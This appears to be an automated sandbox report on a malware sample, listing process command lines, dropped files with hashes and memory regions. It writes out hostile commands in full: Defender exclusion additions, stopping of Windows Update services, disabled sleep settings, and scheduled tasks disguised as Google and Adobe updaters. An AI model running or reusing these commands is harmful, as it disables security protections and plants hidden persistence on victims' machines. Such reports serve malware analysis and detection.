"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffc100446f8,0x7ffc10044708,0x7ffc10044718

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1468,15197628838015195314,7033659375596943053,131072 --disable-features=PaintHolding --lang=en-US --service-sandbox-type=none --use-gl=swiftshader-webgl --headless --mojo-platform-channel-handle=1732 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1468,15197628838015195314,7033659375596943053,131072 --disable-features=PaintHolding --headless --headless --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --override-use-software-gl-for-tests --mojo-platform-channel-handle=1668 /prefetch:2

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=31871 --allow-pre-commit-input --field-trial-handle=1468,15197628838015195314,7033659375596943053,131072 --disable-features=PaintHolding --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=2020 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=31871 --allow-pre-commit-input --field-trial-handle=1468,15197628838015195314,7033659375596943053,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2252 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=31871 --allow-pre-commit-input --field-trial-handle=1468,15197628838015195314,7033659375596943053,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2836 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=31871 --allow-pre-commit-input --field-trial-handle=1468,15197628838015195314,7033659375596943053,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2976 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=31871 --allow-pre-commit-input --field-trial-handle=1468,15197628838015195314,7033659375596943053,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3120 /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lwilj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2068 -ip 2068

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2068 -s 284

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "Start-Process <#datdpvvcoapg#> powershell <#pvuibonxcabzvdcqogx#> -Verb <#pvuibonxcabzvdcqogx#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle hidden Add-MpPreference -ExclusionPath "C:\ProgramData\sY2NsQjNsETOsATOsIDOsUWOsIWOsMDOsU2NsUWO\MTA1.exe" -Force

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc daily /st 13:34 /f /tn "AppLaunch" /tr "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc daily /st 13:34 /f /tn AdobeUpdateTask_MTA1 /tr "C:\ProgramData\sY2NsQjNsETOsATOsIDOsUWOsIWOsMDOsU2NsUWO\MTA1.exe"

Network


Files

C:\Users\Admin\AppData\Local\Temp\mi.exe

C:\Users\Admin\AppData\Local\Temp\cli.exe

C:\Users\Admin\AppData\Local\Temp\cc.exe

C:\Windows\Temp\setup.exe

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\CrashpadMetrics-active.pma

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Local State

\??\pipe\crashpad_4932_NWFSMGQZRWMRNHMR

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Network\Cookies

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Network\Reporting and NEL

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Network\Network Persistent State

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Local Storage\leveldb\LOG

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Local Storage\leveldb\LOG.old

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Local Storage\leveldb\MANIFEST-000001

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Local Storage\leveldb\CURRENT

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nilgdvfq.5fq.ps1

C:\Windows\system32\drivers\etc\hosts

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Cache\Cache_Data\data_3

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Cache\Cache_Data\data_2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Cache\Cache_Data\data_0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Session Storage\MANIFEST-000001

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Session Storage\LOG

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP\Default\Local Storage\leveldb\CURRENT

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\DawnCache\data_1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP\Default\Local Storage\leveldb\MANIFEST-000001

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Session Storage\CURRENT

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\GPUCache\index

MD5 578f406f1d4f6bddae61bd561d4e0d52
SHA1 fca47b1f4f34850f2e7c8746c22ffc0fc6836512
SHA256 72c7ffb4a69ba5345985ad7f5f6335529538f0e0a049ca3d2853ff81f1b83fd4
SHA512 fb3d5737937fd0203d3fa5e94d3e93ce44225f090075883da1ed8a586c0ac1bc66e8363986a790036db6f0f0fd3f1e0a12d7c43b49acc90e8b264ade868007e8

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\GPUCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\GPUCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\GPUCache\data_1

MD5 d0d388f3865d0523e451d6ba0be34cc4
SHA1 8571c6a52aacc2747c048e3419e5657b74612995
SHA256 902f30c1fb0597d0734bc34b979ec5d131f8f39a4b71b338083821216ec8d61b
SHA512 376011d00de659eb6082a74e862cfac97a9bb508e0b740761505142e2d24ec1c30aa61efbc1c0dd08ff0f34734444de7f77dd90a6ca42b48a4c7fad5f0bddd17

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\GPUCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\DawnCache\index

MD5 578f406f1d4f6bddae61bd561d4e0d52
SHA1 fca47b1f4f34850f2e7c8746c22ffc0fc6836512
SHA256 72c7ffb4a69ba5345985ad7f5f6335529538f0e0a049ca3d2853ff81f1b83fd4
SHA512 fb3d5737937fd0203d3fa5e94d3e93ce44225f090075883da1ed8a586c0ac1bc66e8363986a790036db6f0f0fd3f1e0a12d7c43b49acc90e8b264ade868007e8

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\DawnCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\DawnCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\DawnCache\data_1

MD5 d0d388f3865d0523e451d6ba0be34cc4
SHA1 8571c6a52aacc2747c048e3419e5657b74612995
SHA256 902f30c1fb0597d0734bc34b979ec5d131f8f39a4b71b338083821216ec8d61b
SHA512 376011d00de659eb6082a74e862cfac97a9bb508e0b740761505142e2d24ec1c30aa61efbc1c0dd08ff0f34734444de7f77dd90a6ca42b48a4c7fad5f0bddd17

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\DawnCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Code Cache\wasm\index-dir\the-real-index

MD5 efddb91e3f6071fa6dfb3fcf6c6b5bd3
SHA1 f6f411df0eb30839ac6afa91333bb0109a7b09d8
SHA256 7cacb7753815168273af4cea6fce13ed425fac55b17f046a12d687425a5109c6
SHA512 943b872de91e73359964bbef2c9d3f53c7941f40b251c47ee0b513f5f7574a14a9c4ec1f739491a09f45033a3acbb5d4254f9183b6415da778b96d14cb16d73d

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Code Cache\wasm\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Code Cache\js\index-dir\the-real-index

MD5 efddb91e3f6071fa6dfb3fcf6c6b5bd3
SHA1 f6f411df0eb30839ac6afa91333bb0109a7b09d8
SHA256 7cacb7753815168273af4cea6fce13ed425fac55b17f046a12d687425a5109c6
SHA512 943b872de91e73359964bbef2c9d3f53c7941f40b251c47ee0b513f5f7574a14a9c4ec1f739491a09f45033a3acbb5d4254f9183b6415da778b96d14cb16d73d

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Code Cache\js\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Cache\Cache_Data\index

MD5 ad4623aae5ca0e1e79d41b498b403d1c
SHA1 0fef57b3cbecdc8c04b39602b064eaa09e261dd4
SHA256 a3eff91b7581af847869ffe4145e92022ea710526df00a225fa619d7652009c1
SHA512 4b9a5990f5be5112fec5125c5b9a524678a2d86eca29a70080ea58144923f22acb46195d13adc7758fbc88bfd813ed5009fbd00f3d5de294df0564b6eea056f8

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Cache\Cache_Data\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Cache\Cache_Data\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Cache\Cache_Data\data_1

MD5 1663ee1068e7e47c308515c2a4ce7ec6
SHA1 9e80b44de6eb13de893e983e10c06e6b66c3d731
SHA256 68d0994088f0357205da5c29e160c296c8828e5bc039f8c11fd032eab07ec413
SHA512 eee1e6cc531cf20251147ca46ce5354be0d419640d7e86f86f1bbcee95f363ffa1226089531ac586769da7bd34c8b7da080fec12fc2e4dc860b3e84f015d47b1

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Crashpad\settings.dat

MD5 61cb1008da3531b2fe24534811529cc9
SHA1 dd26f8c81f259af4c9fd51ed878a1d11a728597f
SHA256 a44e4f454917bcf07eafcb2175f65a0a1fdad28798af26e9ecca25dd91e67076
SHA512 e2bfd435698258dd6c9d63e2d4ee8204e6035e103013dde3532383cb0e2e7f599f4d7b4ccb0a35f4faa3ce642f937a33ea17646820d8f504c212437c57481d81

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\DevToolsActivePort

MD5 d7072277918940d0a52773530baa7316
SHA1 e890c64f26373fa50d8d7f6d6446d42ca8f2b5c7
SHA256 01d08f1e0515737189b17d81b722c8a8555c6f3cf4b8d9f05a318098b47d640d
SHA512 d04ad1aef5059c248794f12963fd7a71399b946e940fd27d5a7da74feb8b579df73d3e982a50ff4ee1315e66602d12ae3af0c8a5b2fcd59309ecc5f07934d884

memory/3328-431-0x00007FF7A5140000-0x00007FF7A63A5000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP\CrashpadMetrics-active.pma

MD5 3116632b5cce5c8477c694b708a9d8b6
SHA1 1711664c9680416067b96dedbd344b057b88f4aa
SHA256 b4335dbc7e97d271093ec652708e865214b03d1115628cea8255e5d13be14350
SHA512 d124de1b88e858d01cdd4c6c432f417cfbe67716183581b28be3ccdc60b67e09deb0268453e79931184df17cb491238a1b3fe43f71892515320d972a48d1851d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP\Crashpad\throttle_store.dat

MD5 9e4e94633b73f4a7680240a0ffd6cd2c
SHA1 e68e02453ce22736169a56fdb59043d33668368f
SHA256 41c91a9c93d76295746a149dce7ebb3b9ee2cb551d84365fff108e59a61cc304
SHA512 193011a756b2368956c71a9a3ae8bc9537d99f52218f124b2e64545eeb5227861d372639052b74d0dd956cb33ca72a9107e069f1ef332b9645044849d14af337

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP\Crashpad\settings.dat

MD5 df465b263539e0231508292f9f80d518
SHA1 0ea357d96c609fc948e2b199fe8ce3d87f725a6f
SHA256 053eaba160f31378099b33e26d335151f043e992793d828c36aeceebadb2e290
SHA512 d1d4e5110fe083b7221e79ad2a385bf236b39c047fe39eda5f5b1a7ad403064413c588ba19e0267c4d0a18cf6930444ed76bd2d534550462868a0084790165b7

memory/3328-446-0x00007FFC1E7D0000-0x00007FFC1E9C5000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 bc202c47461acbe8bef80e143eb3a364
SHA1 0ef433c2e54c4097f0ac3dc722fb9e4e7b7c2634
SHA256 df144eec828ac28a99d5d148493b3a4c8f36fce79ea7c41c08511ff69d6762bb
SHA512 3bec158714630e6d38867ddba74eda37e036fa2d31c3b3b83229ab593ee85e36c9964aebb31a847bb5b0e65932d8fcfe0860cb6b2a7a31c10204887daa018e08

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP\Local State

MD5 4babfa1eb628818fd007f51e60fcc971
SHA1 a7aca495edd4d357ddb07172cecd1567d2783f4b
SHA256 2498ec4ca7ee175991d405e4b8532f02f065ff938d2be824164608095102f3a3
SHA512 8dabf8511c81ce8ad3b662a3c47e2cf8cf8dd192091f205ecedb19ef31734234e1ab01f21a37937366d5e0c0ab721c016131ed3d355e32fcad8fa98a9c860f11

memory/3864-448-0x00007FF765020000-0x00007FF766285000-memory.dmp

memory/3864-450-0x00007FF765020000-0x00007FF766285000-memory.dmp

memory/3864-453-0x00007FFC1E7D0000-0x00007FFC1E9C5000-memory.dmp

memory/3864-454-0x00007FF765020000-0x00007FF766285000-memory.dmp

\??\pipe\LOCAL\crashpad_2828_BTWOUSNAZTTQOGNV

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/3864-456-0x00007FF765020000-0x00007FF766285000-memory.dmp

memory/3864-457-0x00007FF765020000-0x00007FF766285000-memory.dmp

memory/3864-458-0x00007FF765020000-0x00007FF766285000-memory.dmp

memory/3864-459-0x00007FF765020000-0x00007FF766285000-memory.dmp

memory/3864-461-0x00007FF765020000-0x00007FF766285000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP\Default\Local Storage\leveldb\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP\Default\Local Storage\leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP\Default\Local Storage\leveldb\LOG

MD5 b23645daf6f9e59acbb7258ca37b7ad5
SHA1 ca3bf1d130e7ea551ce9ef5bc8de361577e8b7cd
SHA256 dc6002c7a84b2d30659490f5e673a2ec22309658907a90e05a8b1a8a21878307
SHA512 2d5ee6d7341083c4509e88626376bd34af7c9504f590970db189c58ddc7d4e90622abb9c65a80633ccd16c58b90bbf968df4a595d6056c2fcd16f9ca54338544

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP\Default\Local Storage\leveldb\LOG.old

MD5 b9e551c29c24eb8e169c16151574127b
SHA1 2e3239056ac973eb1c55dddee10fb44c7366d3ee
SHA256 b7a1f63ce1a188377aa1ef5e95a1d29367dd65cd1a65ee7674047855d3470684
SHA512 298e6e3228abf4c4de665681e7f0966c3cce9c12e9ad0fffa092419dab2c3093ed8eff3b1f6d2e36ac7c1fad10d03f60a54640130e6f1816fccea033602a4176

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP\Default\Cookies

MD5 49693267e0adbcd119f9f5e02adf3a80
SHA1 3ba3d7f89b8ad195ca82c92737e960e1f2b349df
SHA256 d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f
SHA512 b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

memory/3864-493-0x00007FF765020000-0x00007FF766285000-memory.dmp

memory/1824-509-0x00007FFBFF5F0000-0x00007FFC000B1000-memory.dmp

memory/1824-510-0x000002612B580000-0x000002612B590000-memory.dmp

memory/3864-511-0x00007FFC1E7D0000-0x00007FFC1E9C5000-memory.dmp

memory/1824-512-0x000002612B580000-0x000002612B590000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP\Default\GPUCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

memory/4924-568-0x00000000747F0000-0x0000000074FA0000-memory.dmp

memory/1824-579-0x000002612BA50000-0x000002612BA6C000-memory.dmp

memory/3864-569-0x00007FF765020000-0x00007FF766285000-memory.dmp

memory/1824-580-0x00007FF40A800000-0x00007FF40A810000-memory.dmp

memory/1824-581-0x000002612BA40000-0x000002612BA4A000-memory.dmp

memory/1824-582-0x000002612BC90000-0x000002612BCAC000-memory.dmp

memory/1824-583-0x000002612BC70000-0x000002612BC7A000-memory.dmp

memory/1824-584-0x000002612BCD0000-0x000002612BCEA000-memory.dmp

memory/1824-585-0x000002612BC80000-0x000002612BC88000-memory.dmp

memory/1824-586-0x000002612BCB0000-0x000002612BCB6000-memory.dmp

memory/1824-587-0x000002612BCC0000-0x000002612BCCA000-memory.dmp

memory/1824-588-0x000002612B580000-0x000002612B590000-memory.dmp

memory/4180-622-0x0000000001260000-0x0000000001280000-memory.dmp

memory/3864-623-0x00007FF765020000-0x00007FF766285000-memory.dmp

memory/4624-625-0x00007FF7B8590000-0x00007FF7B85BA000-memory.dmp

memory/2920-626-0x0000000000500000-0x0000000000627000-memory.dmp

memory/2920-634-0x0000000000500000-0x0000000000627000-memory.dmp

memory/2920-635-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp

memory/2920-637-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp

memory/2920-636-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp

memory/2920-638-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp

memory/2920-639-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp

memory/2920-640-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp

memory/2920-641-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp

memory/2920-642-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp

memory/2920-644-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp

memory/2920-645-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp

memory/2920-643-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp

memory/2920-646-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp

memory/2920-647-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp

memory/2920-648-0x00000000FFBE0000-0x00000000FFBF0000-memory.dmp

